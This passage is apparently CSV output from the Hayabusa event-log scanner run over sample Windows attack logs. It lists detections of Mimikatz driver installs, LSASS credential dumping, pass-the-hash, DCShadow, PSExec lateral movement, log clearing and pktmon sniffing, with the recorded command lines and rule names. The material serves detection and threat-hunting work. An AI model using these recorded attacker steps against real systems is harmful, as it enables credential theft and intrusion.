https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2021-03-16 03:54:15.647 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: efc1a28b.png | URL: https://i.imgur.com/IFpvPlt.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2021-03-16 03:55:38.049 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: 
C:\Users\IEUser\AppData\Local\Temp\{259DDBBE-DDD3-4590-8A2C-60211631093C}-GoogleUpdateSetup.exe | URL: http://r5---sn-5hnedn7l.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe?cms_redirect=yes&mh=pH&mip=213.127.64.248&mm=28&mn=sn-5hnedn7l&ms=nvh&mt=1615834104&mv=m&mvi=5&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-16 04:01:32.985 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{F1502BD5-ADFF-4123-9C07-0E4B02FCB037}-89.0.4389.82_87.0.4280.66_chrome_updater.exe | URL: http://r1---sn-5hne6nlr.gvt1.com/edgedl/release2/chrome/AKGnpidu3x0C0gtuxw-XHRQ_89.0.4389.82/89.0.4389.82_87.0.4280.66_chrome_updater.exe?cms_redirect=yes&mh=rx&mip=213.127.64.248&mm=28&mn=sn-5hne6nlr&ms=nvh&mt=1615834584&mv=m&mvi=1&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-17 00:50:54.591 +09:00,jump01.offsec.lan,7045,info,,New Service Installed,Name: Npcap Packet Driver (NPCAP) | Path: \SystemRoot\system32\DRIVERS\npcap.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2021-03-26 06:56:19.530 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: pktmon filter add -p 80 | Path: C:\Windows\System32\PktMon.exe | PID: 0x16d0 | User: admin | LID: 0x977caa,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx
2021-03-26 06:56:32.794 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: pktmon comp list | Path: C:\Windows\System32\PktMon.exe | PID: 0x2b0c | User: admin | LID: 0x977caa,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx
2021-03-26 06:56:50.874 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: pktmon stpop | Path: C:\Windows\System32\PktMon.exe | PID: 0x2bdc | User: admin | LID: 0x977caa,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx
2021-03-26 06:56:53.090 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: pktmon stop | Path: C:\Windows\System32\PktMon.exe | PID: 0x1bc0 | User: admin | LID: 0x977caa,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx
2021-03-26 06:57:05.324 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xec8 | User: FX-BS7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx
2021-03-26 06:57:11.415 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb60 | User: FX-BS7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx
2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,Svc: mimikatz driver (mimidrv) | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,info,,New Service Installed,Name: mimikatz driver (mimidrv) | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys | Account: | Start Type: auto start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx
2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx
2021-03-27 01:17:29.210 +09:00,jump01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx
2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,Svc: mimikatz driver (mimidrv) | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,info,,New Service Installed,Name: mimikatz driver (mimidrv) | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys | Account: | Start Type: auto start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx
2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx
2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,CredAccess | Exec,Credential Dumping Tools Service Execution,,rules/sigma/builtin/security/win_security_mal_creddumper.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx
2021-03-27 01:36:00.106 +09:00,jump01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4658,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,critical,CredAccess,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,CredAccess,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,high,CredAccess,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
2021-03-27 01:59:24.880 +09:00,rootdc1.offsec.lan,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx
2021-03-27 01:59:24.892 +09:00,rootdc1.offsec.lan,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx
2021-03-27 05:41:38.966 +09:00,rootdc1.offsec.lan,4742,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742-SPN set on computer account (DCshadow).evtx
2021-03-27 05:41:39.009 +09:00,rootdc1.offsec.lan,4742,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742-SPN set on computer account (DCshadow).evtx
2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | LID: 0x76073 | PID: 7280 | PGUID: 747F3D96-3A77-607F-0000-00105DD17600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:00.296 +09:00,MSEDGEWIN10,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:00.305 +09:00,MSEDGEWIN10,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:00.306 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\samir | Process: System | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:00.384 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\user03 | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile | LID: 0x770575 | PID: 2740 | PGUID: 747F3D96-3A7C-607F-0000-001058067700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:01.944 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 127.0.0.1:49925 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2532 | PGUID: 747F3D96-04C3-607F-0000-0010F13B1E00,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:01.944 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:01.944 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49925 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 4912 | PGUID: 747F3D96-3A89-607F-0000-001028587700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 5280 | PGUID: 747F3D96-3A8A-607F-0000-0010E4717700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:14.860 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.2.17:137 (MSEDGEWIN10) | Dst: 10.255.255.255:137 () | User: | Process: | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:14.861 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.255.255.255:137 () | Dst: 10.0.2.17:137 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:18.296 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.3.15:137 (MSEDGEWIN10.home) | Dst: 10.0.3.255:137 () | User: | Process: | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:18.296 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.3.255:137 () | Dst: 10.0.3.15:137 (MSEDGEWIN10.home) | User: | Process: | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:20.254 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49926 (MSEDGEWIN10) | Dst: 127.0.0.1:5357 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 18:27:51.181 +09:00,jump01.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx
2021-04-21 18:27:56.082 +09:00,jump01.offsec.lan,7045,high,,PSExec Lateral Movement,Service: PSEXESVC | Path: %SystemRoot%\PSEXESVC.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/alerts/System/7045_LateralMovement-PSEXEC.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx
2021-04-21 18:27:56.082 +09:00,jump01.offsec.lan,7045,info,,New Service Installed,Name: PSEXESVC | Path: %SystemRoot%\PSEXESVC.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx
2021-04-21 18:40:32.342 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: PSEXESVC.exe | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: PSEXESVC.exe | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.347 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1375fd8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1375ff5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1376003,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.360 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1376020,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.364 +09:00,srvdefender01.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: PSEXESVC | User: admmig | LID: 0x1376020 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
